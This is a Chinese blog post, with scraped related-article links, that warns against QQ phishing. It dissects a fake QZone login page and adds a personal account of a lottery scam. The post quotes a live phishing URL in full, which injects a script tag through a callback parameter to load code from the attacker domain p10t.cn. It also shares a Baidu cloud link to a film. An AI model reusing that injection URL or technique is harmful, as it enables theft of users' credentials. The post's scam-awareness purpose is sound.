前言

相信大家在懵懂无知的时候都有被盗号的经历吧,QQ胡乱的加好友,突然有个好友传了个文件给你,打开以后发现QQ竟然显示强制下线,然后再也上不去了QAQ,很明显,QQ号被人盗了。最近也是很多小伙伴私信我,也看了一些人发空间说QQ号被盗了啥的,以及我自己收到的一些诈骗请求。网上针对防骗这块的文章几乎没有,为了不让更多的人受害,下面我将会以最真实朴素的语言介绍最常见的一种盗号诈骗方式,浅析一下这个盗号原理的全过程~~~希望大家不要再上当受骗啦~!

正文

下面我给大家介绍一种最常见的QQ诈骗方式。

这个是我今早收到的一条链接,相信不少朋友肯定也收到类似的链接吧,甚至乎很多人都说因为点开这个链接被盗号吧。。。只有不懂安全,没用安全意识的人才会这么说吧!!!

让我带大家来剖析一下这个东东吧~~~

很明显,你看这个域名看不出任何眉头,既然大家都不敢点,我就替大家点点看~~~

首先我们在手机端点开这个链接

点开一看,我们可以看到,是一个QQ空间登录界面,这个界面就是一个欺骗用户的界面,为什么这么说呢,你把这个界面链接复制出来,用浏览器打开,你会发现网页无法打开,并且域名成了下面这个:

http://sdk.h5.gamedog.cn/apih5v2/getIsLogin/?callback=%00%00%00%00%00%00%00%3CscripT/src%3D//p10t.cn/app.php%3Faid%3D5%3E%3C/scripT%3E%3C!--&bqvoqvwqtujhigzkumjk.png

看样子域名被浏览器解析成了一张png图片,你可能会有点好奇这个,我们用pc端按照这个地址进行追踪,用F12查看网页源代码

<scripT/src=//p10t.cn/app.php?aid=5></scripT><!--({"code":-2,"msg":"\u7528\u6237\u672a\u767b\u5f55"})

就只有这么一行,我们可以看到从登录页面输入完账号密码以后会跳转到一个app.php网页里面,我们循规蹈矩,直接去追踪访问那个界面

有点意思,网页从QQ空间进行跳转的

window.location.href = "http://qzone.qq.com";

学过JavaScript的朋友应该知道,location.href="网站链接",表示重新定向到新页面,同时刷新打开的这个页面;

这个意思是从一个伪QQ空间的页面上输入账户密码,这个页面被植入了php的恶意木马,通过跳转重定向,直接跳转到了木马网站去了,后台数据库并记录了这条信息,然后你的QQ号账户密码就被别人成功获取了~~~

如果不信的话,我们可以一起来试一试

首先输入账号密码。。。我们就随便伪造一个,账号是3838438,密码就写一个mmpsbsbsb试试看!!!

这里还要说一点,我试的时候这里好像做的还挺真实的,防中文输入,我本来想直接开口大骂呢,hhhh,没给我这个机会。。。

这里无论输入什么账号密码都可以过,除了中文无法检测,账号必须是一连串的数字,密码防了中文输入。

然后我点击登录

看吧,直接就登录成功了,还有这张图片,这这这。。。完全就是挑衅啊,竟然贴一张小狗的图片,是在考验我智商嘛?

我尝试了一下ping它的主页,ping p10t.cn

ping通了,说明这个网站还活着。

但是登录页面显示403错误,服务器拒绝访问,我不是很清楚如何绕过这一防线。

那我也没辙了,技术不够精湛,我只能写下这篇文章记录一下,希望更多的人看到,不要再上当受骗了就好~~~

如果文章哪里写的有出路的地方,希望各位不吝赐教,如果有更好的解决方案,欢迎在评论区留言或私信给我,感谢大家的支持~~~

关于其他类型的诈骗

可能有些人遇到一些其他的诈骗,比如电话诈骗,短信诈骗,讲一个最真实的例子,推荐你们看一部电影,叫嘉年华,里面讲述的是关于电信诈骗的案件,这部电影是由真实事件改编而成的,非常推荐大家观看,里面有一些防诈骗的技巧,看完以后你会对常见的诈骗手段有了一个更深层次的了解。

如果没有找到资源的小伙伴,我也会在文章中分享给你们一个百度云链接,保存以后下载观看即可:链接:https://pan.baidu.com/s/1CrYJ9jtkSqqxzZSlzQTsqA 密码:2qlz

说这么多,可能大家会认为我在吹牛皮,认为这些事情不会发生在自己身上。我讲一个最真实的例子,我母亲因为前段时间地上见到一张彩票,刮开奖说中了10w块钱,我身在一个并不宽裕的家庭,按照现在的话来讲,算是贫农家庭,还远没达到小康水平,想想看,10w块钱从天而降,对于我们这种家庭,这绝对算是一笔相当的财富,当时我妈拿着彩票回家,和我还有我爸商量来着,我一看说,这肯定是骗局吧,这么好的事情为什么偏偏出现在我们身上,天上不会掉馅饼,努力奋斗才能梦想成真,我妈偏不信这个邪,想去试一试,然后拨打了上面的电话,上面巴拉巴拉说了一大堆,意思就是要交3000块钱税钱啥的,然后才能兑换这个钱,你看,这不明显是骗局嘛,我妈又觉得,如果得到了这个钱,相当于她少上多少年的班,其实说白了这一切都是为了这个不争气的我,我其实也是很愧疚的。所以朋友们要记住,只要谈到钱这个问题,要悠着点,十有八九都是骗局,我妈最后是按照地址打钱过去了,然后事实上,对方并没有想要兑换的意思,巴拉巴拉说了一大堆,好像又是要交钱。。。我妈现在才意识到被骗了,然后跑到警局报了案,警方说,你不是第一个了,关于彩票中奖被骗的人一大堆,他们说没有足够的证据线索,立不了案,没办法了,3k被狗吃了,这可是辛辛苦苦东奔西跑的血汗钱,这些骗子也是一点良心都没有,所以。。。后来我励志要当一名网警,要把这些逍遥法外的人绳之以法,天网恢恢疏而不漏,这些人最终一定逃不了法律的制裁的。

后记

关于盗号这一问题,我给大家提醒两句,只要少一点好奇心,少一点贪欲,多一点警惕之心,不管是什么类型的诈骗都不会出现在你身上,谨记哦。。。

不要再被骗了------QQ盗号原理大揭秘的更多相关文章

  1. 诗人般的机器学习,ML工作原理大揭秘

    诗人般的机器学习,ML工作原理大揭秘 https://mp.weixin.qq.com/s/7N96aPAM_M6t0rV0yMLKbg 选自arXiv 作者:Cassie Kozyrkov 机器之心 ...

  2. Protocol Buffer 序列化原理大揭秘 - 为什么Protocol Buffer性能这么好?

    前言 习惯用 Json.XML 数据存储格式的你们,相信大多都没听过Protocol Buffer Protocol Buffer 其实 是 Google出品的一种轻量 & 高效的结构化数据存 ...

  3. AsyncTaskLoader设计原理大揭秘

    简介 在Android异步处理之AsyncTaskLoader简单使用中我简单的介绍了一下AsyncTaskLoader的基本用法和使用场景,对AsyncTaskLoader还不是很熟悉的小伙伴可以先 ...

  4. App可视化埋点技术原理大揭秘

    一.背景 运营者能够对用户行为进行分析的前提,是对大量数据的掌握.在以往,这个数据通常是由开发者在控件点击.页面等事件中,一行行地编写埋点代码来完成数据收集的.然而传统的操作模式每当升级改版时,开发和 ...

  5. 【腾讯Bugly干货分享】iOS黑客技术大揭秘

    本文来自于腾讯bugly开发者社区,非经作者同意,请勿转载,原文地址:http://dev.qq.com/topic/5791da152168f2690e72daa4 “8小时内拼工作,8小时外拼成长 ...

  6. 病毒木马查杀实战第012篇:QQ盗号木马之逆向分析

    前言 在本系列的文章中,对每一个病毒分析的最后一个部分,若无特殊情况,我都会采用逆向分析的手段来为读者彻底剖析目标病毒.但是之前的"熊猫烧香"病毒,我用了三篇文章的篇幅(每篇250 ...

  7. Atitit.javascript 实现类的方式原理大总结

    Atitit.javascript 实现类的方式原理大总结 1. 实现类的式::构造方法方式:原型方式:构造方法+原型的混合方式 1 2. 原型方式(function mode)经典式..实现属性推荐 ...

  8. 谷歌钦定的编程语言Kotlin大揭秘

    第一时间关注程序猿(媛)身边的故事 谷歌钦定的编程语言Kotlin大揭秘 语法+高级特性+实现原理:移动开发者升职加薪宝典! 谷歌作为世界级的科技公司巨头,强悍的技术研发与创新能力使其一直是业界的楷模 ...

  9. QQ上传大文件为什么这么快

    今天和同事在群里讨论“QQ上传大文件/QQ群发送大文件时,可以在极短的时间内完成”是如何做到的. 有时候我们通过QQ上传一个几百M的文件,竟然只用了几秒钟,从带宽上限制可以得出,实际上传文件是不可能的 ...

随机推荐

  1. 脚本检测Kafka和Zookeeper

    Java测试环境中Kafka最近总是自动停止,所有写了一个简单的脚本来监听Kafka和Zookeeper,其中Kafka监听端口为9092,Zookeeper监听端口为2181,脚本如下: #!/bi ...

  2. Centos 7 Puppet之foreman介绍安装测试

    一.简介 1.前言(引用一下网上的资料) 随着企业的 Linux 系统数量越来越多,管理问题便成为一个相对麻烦并需要急 迫解决的问题,这里有 2 个 Key Message:1)统一管控体系非常重要, ...

  3. JS_正则表达式_获取指定字符之后指定字符之前的字符串

    一个常见的场景,获取:标签背景图片链接: 如字符串:var bgImg = "url(\"https://img30.360buyimg.com/sku/jfs/t26203/26 ...

  4. excel使用poi操作。

    String real_path = request.getSession().getServletContext().getRealPath("/");//获取文件路径,我是通过 ...

  5. #WEB安全基础 : HTML/CSS | 0x6嵌套标签(图片链接)

    嵌套标签我们已经讲一次了,在0X4.1里,我们把列表嵌套了 你觉得文字链接难看得令人作呕,好,你再也不会有这种感觉了   一如既往,一个html文件和一个存放图片的文件夹 index.html的代码, ...

  6. Building QGIS from source - step by step(随笔3)

    依赖包安装 在编译QGIS前分别需要利用cygwin和OSGeo4W 安装网站上的依赖库.分别需要安装的依赖库可以参考官网,此外对应版本的ygwin和OSGeo4W 也可以在网站上找到下载链接. ht ...

  7. 从.Net到Java学习第三篇——spring boot+mybatis+mysql

    从.Net到Java学习第一篇——开篇 环境:mysql5.7 新建mysql数据库demo,然后执行如下sql脚本进行数据表创建和数据初始化: -- ------------------------ ...

  8. Windows7 WIN 7 64位 环境编译6sv2.1版本的大气传输模型

    从来没见过Fortran...这次为了添加国产卫星光谱响应的支持,只能从零开始肯了. 6S模型主页:http://6s.ltdri.org/index.html. 下载最新的2015年更新的6SV2. ...

  9. vue中input输入框的模糊查询实现

    最近在使用vue写webapp在,一些感觉比较有意思的分享一下. 1:input输入框: <input class="s-search-text" placeholder=& ...

  10. Javascript数组系列五之增删改和强大的 splice()

    今天是我们介绍数组系列文章的第五篇,也是我们数组系列的最后一篇文章,只是数据系列的结束,所以大家不用担心,我们会持续的更新干货文章. 生命不息,更新不止! 今天我们就不那么多废话了,直接干货开始. 我 ...